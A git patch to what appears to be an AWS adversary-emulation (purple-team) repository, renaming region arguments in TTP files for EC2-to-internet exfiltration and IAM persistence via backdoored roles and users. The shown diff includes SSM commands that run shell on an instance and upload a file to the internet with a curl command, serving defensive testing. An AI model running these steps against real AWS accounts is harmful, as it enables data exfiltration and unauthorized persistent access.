From cea4ff102b5d049e5197b587f309a2ec6f46b896 Mon Sep 17 00:00:00 2001
From: Isaac Fletcher <ifletch@meta.com>
Date: Fri, 6 Feb 2026 12:29:44 -0800
Subject: [PATCH] Fix AWS TTPs with incomplete arguments

Summary: This commit fixes several TTPs that had incorrect/incomplete arguments defined which prevented them from being run successfully.

Reviewed By: d0n601

Differential Revision: D92546859
---
 .../aws-ec2-exfil-from-ec2-to-internet/ttp.yaml     | 13 +++++++------
 ttps/persistence/aws-iam-access-iam-role/ttp.yaml   |  5 ++++-
 .../aws-iam-create-new-iam-role/ttp.yaml            |  3 +++
 .../aws-iam-create-new-iam-user/ttp.yaml            |  3 +++
 4 files changed, 17 insertions(+), 7 deletions(-)

diff --git a/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml b/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml
index 2f11da8..0e53139 100644
--- a/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml
+++ b/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml
@@ -11,8 +11,9 @@ description: |
   The output is stored in file `/tmp/exfil_url.txt`
 
 args:
-  - name: aws_region
-    description: The AWS region the EC2 instance is in.
+  - name: region
+    description: The AWS region to use.
+    default: us-east-1
   - name: ec2_instance_id
     description: The instance ID of the EC2 to exfiltrate the test file from.
   - name: generated_exfil_file_path
@@ -59,23 +60,23 @@ steps:
   - name: generate_exfil_file_over_ssm
     description: Generate a file for exfiltration on the ec2 instance to be exfiltrated.
     inline: |
-      aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+      aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
       --parameters commands=["sudo su ubuntu && \
       openssl rand -out {{.Args.generated_exfil_file_path}} {{.Args.exfil_file_size_bytes}}"] > /dev/null
     cleanup:
       inline: |
-        aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+        aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
         --parameters commands=["sudo su ubuntu && \
         rm {{.Args.generated_exfil_file_path}}"] > /dev/null
 
   - name: upload_exfil_file
     description: Upload the generated exfil file to the internet. The URL of uploaded file can be found in `tmp/exfil_url.txt`
     inline: |
-      aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+      aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
       --parameters commands=["sudo su ubuntu && \
       {{.Args.curl_upload_command}} {{.Args.generated_exfil_file_path}} -o /tmp/exfil_url.txt && cat /tmp/exfil_url.txt"] > /dev/null
     cleanup:
       inline: |
-        aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+        aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
         --parameters commands=["sudo su ubuntu && \
         rm /tmp/exfil_url.txt"] > /dev/null
diff --git a/ttps/persistence/aws-iam-access-iam-role/ttp.yaml b/ttps/persistence/aws-iam-access-iam-role/ttp.yaml
index 51e998c..c6ed8a0 100644
--- a/ttps/persistence/aws-iam-access-iam-role/ttp.yaml
+++ b/ttps/persistence/aws-iam-access-iam-role/ttp.yaml
@@ -12,8 +12,11 @@ description: |
   `--no-cleanup` options should be explicity specified if we do not want the new role created to be deleted.
 
 args:
+  - name: region
+    description: The AWS region to use.
+    default: us-east-1
   - name: iam_role_name
-    description: The name of the  backdoored IAM role to be assumed.
+    description: The name of the backdoored IAM role to be assumed.
     default: ttpforge_trojan_role
   - name: backdoor_account_id
     description: AWS account ID which has been backdoored for access via attacker controled IAM role
diff --git a/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml b/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml
index 2b0d2d0..c70d686 100644
--- a/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml
+++ b/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml
@@ -12,6 +12,9 @@ description: |
   `--no-cleanup` options should be explicity specified if we do not want the new role created to be deleted.
 
 args:
+  - name: region
+    description: The AWS region to use.
+    default: us-east-1
   - name: iam_role_name
     description: The name of the new IAM role to be created.
     default: ttpforge_trojan_role
diff --git a/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml b/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml
index 880d18a..c833016 100644
--- a/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml
+++ b/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml
@@ -11,6 +11,9 @@ description: |
   `--no-cleanup` options should be explicity specified if we do not want the new user created to be deleted.
 
 args:
+  - name: region
+    description: The AWS region to use.
+    default: us-east-1
   - name: iam_user_name
     description: The name of the new IAM user to be created.
     default: purple_trojan